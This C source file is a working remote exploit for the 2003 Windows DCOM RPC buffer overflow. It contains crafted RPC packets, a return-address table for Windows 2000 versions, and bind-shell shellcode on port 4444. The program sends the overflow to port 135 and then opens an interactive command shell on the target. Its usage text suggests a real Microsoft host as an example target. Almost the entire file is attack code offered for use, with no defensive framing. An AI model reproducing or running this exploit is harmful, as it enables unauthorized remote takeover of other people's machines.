/*
**
** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
**
** FlashSky/Benjurry and, H D Moore's code is very excellent.
** It works well even if change only return address.
** I didn't feel necessity for new make.
**
** Thankful to them.
**
** 2003/07/30 - Update, Added magic return address.
**
** kokanin supplied very excellent information:
** URL: http://lists.netsys.com/pipermail/full-disclosure/2003-July/012000.html
**
** * As well as Korean thanks to, a lot of systems can exploit.
**
** --
** Thank you.
**
** P.S: Sorry, for my poor english.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

u_char bindstr[]={
	0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,
	0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
	0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,
	0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
	0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
	0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,
	0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
	0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
u_char request1[]={
	0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,
	0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
	0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,
	0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,
	0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
	0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,
	0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,
	0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
	0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,
	0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
	0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,
	0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
	0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
	0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,
	0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
	0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
	0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
	0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,
	0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
	0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
	0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
	0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,
	0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
	0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,
	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
	0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,
	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
	0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,
	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
	0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,
	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
	0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,
	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
	0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,
	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
	0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,
	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
	0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,
	0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
	0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,
	0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
	0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
	0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,
	0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
	0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,
	0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
	0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
	0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,
	0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
	0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,
	0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
	0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,
	0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
	0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
	0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
	0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
	0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
	0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,
	0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
	0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
	0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
	0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
	0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
	0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
	0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
	0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char request2[]=
{
	0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
u_char request3[]=
{
	0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,
	0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
	0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,
	0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
	0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
	0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
	0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,
	0x63,0x00,0x00,0x00
};
u_char request4[]=
{
	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
	0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
	0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,
	0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
	0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,
	0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char shellcode[]=
{
	/* port 4444 bind shellcode */
	0x46,0x00,0x58,0x00,0x4e,0x00,0x42,0x00,
	0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
	0x4e,0x00,0x42,0x00,0x46,0x00,0x58,0x00,
	0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
	0x46,0x00,0x58,0x00,0xff,0xff,0xff,0xff,
	0xcc,0xe0,0xfd,0x7f,0xcc,0xe0,0xfd,0x7f,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,
	0x19,0x5e,0x31,0xc9,0x81,0xe9,0x89,0xff,
	0xff,0xff,0x81,0x36,0x80,0xbf,0x32,0x94,
	0x81,0xee,0xfc,0xff,0xff,0xff,0xe2,0xf2,
	0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
	0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
	0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
	0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
	0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
	0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
	0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
	0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
	0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
	0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
	0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
	0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
	0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
	0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
	0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
	0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
	0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
	0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
	0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
	0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
	0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
	0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
	0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
	0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
	0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
	0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
	0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
	0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
	0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
	0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
	0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
	0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
	0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
	0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
	0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
	0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
	0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
	0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
	0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
	0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
	0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
	0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
	0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
	0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
	0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
	0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
	0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
	0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
	0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
	0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
	0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
	0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
	0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
	0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
	0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
	0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
	0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
	0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
	0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
	0x2f,0xa2,0x04,0x00
};

struct os_plat_pk
{
	int op_pk_num;
	char *op_pk_str;
	u_long retloc_jmp_esp;
};
struct os_plat_pk __pt_pkg_form[]=
{
	{0,"Windows 2000 magic version 1",0x0018759F},
	{1,"Windows 2000 magic version 2",0x001875E3},
	{2,"Windows 2000 magic version 3",0x001F0CD0},
	{3,"Windows 2000 magic version 4",0x010016C6},
	{4,"Windows 2000 magic version 5",0x010016CB},
	{0x82,NULL,0}
};

#define DEF_STR "It's test"
#define DEF_BF (0x1000)
#define DEF_SZ (0xff)
#define GET_SZ (0x400)

int sexsock(char *conn_host_nm,int conn_port_nm);
void start_shell(int st_sock_va);
void re_connt_lm(int st_sock_va);
void pri_usg(char *f_nm);
void pri_banrl();

int main(int argc, char *argv[])
{
	int sock,type_def=(0),r_r1,r_r2,whgl;
	u_long retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
	u_char get_bf[(DEF_BF)],atk_bf[(DEF_BF)];
	char def_host[(DEF_SZ)]=(DEF_STR);

	(void)pri_banrl();
	while((whgl=getopt(argc,argv,"T:t:H:h:Ii"))!=EOF)
	{
		switch(whgl)
		{
			case 'T':
			case 't':
				if((type_def=atoi(optarg))>4)
				{
					(void)pri_usg(argv[0]);
				}
				else retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
				break;

			case 'H':
			case 'h':
				memset((char *)def_host,0,sizeof(def_host));
				strncpy(def_host,optarg,sizeof(def_host)-1);
				break;

			case 'I':
			case 'i':
				(void)pri_usg(argv[0]);
				break;

			case '?':
				(void)pri_usg(argv[0]);
				break;
		}
	}
	if(strstr(def_host,(DEF_STR)))
	{
		(void)pri_usg(argv[0]);
	}
	fprintf(stdout," [*] Target: %s.\n",__pt_pkg_form[type_def].op_pk_str);
	
	fprintf(stdout," [0] Add return address.\n");
	memcpy((u_char *)shellcode+36,(u_char *)&retloc_jmp_esp,4);
	fprintf(stdout," [1] Start, shellcode setting.\n");
	memcpy((u_char *)atk_bf,request1,sizeof(request1));
	r_r1=sizeof(request1);
	r_r2=sizeof(shellcode)/2;

#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l

	QIK_SHIFT(request2,0,r_r2);
	QIK_SHIFT(request2,8,r_r2);

	memcpy((u_char *)atk_bf+r_r1,request2,sizeof(request2));
	r_r1+=sizeof(request2);
	memcpy((u_char *)atk_bf+r_r1,shellcode,sizeof(shellcode));
	r_r1+=sizeof(shellcode);
	memcpy((u_char *)atk_bf+r_r1,request3,sizeof(request3));
	r_r1+=sizeof(request3);
	memcpy((u_char *)atk_bf+r_r1,request4,sizeof(request4));
	r_r1+=sizeof(request4);
	r_r2=sizeof(shellcode)-12;

	QIK_SHIFT(atk_bf,8,r_r2);
	QIK_SHIFT(atk_bf,16,r_r2);
	QIK_SHIFT(atk_bf,128,r_r2);
	QIK_SHIFT(atk_bf,132,r_r2);
	QIK_SHIFT(atk_bf,180,r_r2);
	QIK_SHIFT(atk_bf,184,r_r2);
	QIK_SHIFT(atk_bf,208,r_r2);
	QIK_SHIFT(atk_bf,396,r_r2);

	fprintf(stdout," [2] Trying %s:135 ...\n",def_host);
	sock=(int)sexsock(def_host,(135));
	(void)re_connt_lm(sock);
	
	fprintf(stdout," [3] Connected to %s:135.\n",def_host);
	send(sock,bindstr,sizeof(bindstr),0);
	recv(sock,get_bf,sizeof(get_bf),0);
	
	fprintf(stdout," [4] Send, attack code.\n");
	send(sock,atk_bf,r_r1,0);
	close(sock);
	
	fprintf(stdout," [5] OK, Trying %s:4444 ...\n",def_host);
	fprintf(stdout," [*] Waiting, cmd shell ");
	fflush(stdout);
	sleep(1);
	
	fprintf(stdout,".");
	fflush(stdout);
	sleep(1);
	
	fprintf(stdout,".");
	fflush(stdout);
	sleep(1);
	
	fprintf(stdout,".\n");
	sock=(int)sexsock(def_host,(4444));
	(void)re_connt_lm(sock);
	(void)start_shell(sock);

	exit(0);
}

int sexsock(char *conn_host_nm,int conn_port_nm)
{
	int sock;
	struct hostent *sxp;
	struct sockaddr_in sxp_addr;
 
	if((sxp=gethostbyname(conn_host_nm))==NULL)
	{
		herror(" [-] gethostbyname() error");
		return(-1);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
	{
		perror(" [-] socket() error");
		return(-1);
	}
	sxp_addr.sin_family=AF_INET;
	sxp_addr.sin_port=htons(conn_port_nm);
	sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
	bzero(&(sxp_addr.sin_zero),8);

	if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
	{
		perror(" [-] connect() error");
		return(-1);
	}
	return(sock);
}

void start_shell(int st_sock_va)
{
	int died;
	char *command="cd C:\\ & echo Wow, are u hacker now ?!\n";
	char readbuf[(GET_SZ)];
	fd_set rset;
	memset((char *)readbuf,0,sizeof(readbuf));
	fprintf(stdout," [!] Executed shell successfully !\n\n");
	send(st_sock_va,command,strlen(command),0);

	for(;;)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(st_sock_va,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(st_sock_va+1,&rset,NULL,NULL,NULL);

		if(FD_ISSET(st_sock_va,&rset))
		{
			died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
			if(died<=0)
				exit(0);
			readbuf[died]=0;
			fprintf(stdout,"%s",readbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
			if(died>0)
			{
				readbuf[died]=0;
				write(st_sock_va,readbuf,died);
			}
		}
	}
	return;
}

void re_connt_lm(int st_sock_va)
{
	if(st_sock_va==-1)
	{
		fprintf(stdout," [-] Failed.\n\n");
		fprintf(stdout," Happy Exploit ! :-)\n\n");
		exit(-1);
	}
}

void pri_usg(char *f_nm)
{
	int r_rn=0;
	fprintf(stdout," Usage: %s -option [argument]\n\n",f_nm);
	fprintf(stdout,"\t -h [hostname] - target host.\n");
	fprintf(stdout,"\t -t [number]   - select target number.\n\n");
	fprintf(stdout," Select target number>\n\n");
	for(;;)
	{
		if(__pt_pkg_form[r_rn].op_pk_num==(0x82))
			break;
		else
		{
			fprintf(stdout,"\t {%d} %s\n",__pt_pkg_form[r_rn].op_pk_num,__pt_pkg_form[r_rn].op_pk_str);
		}
		r_rn++;
	}
	fprintf(stdout,"\n Exmaple> %s -h korea.microsoft.com -t3\n\n",f_nm);
	exit(0);
}

void pri_banrl()
{
	fprintf(stdout,"\n DCOM RPC WIN32 remote exploit (Most languages)\n\n");
}

/* eox */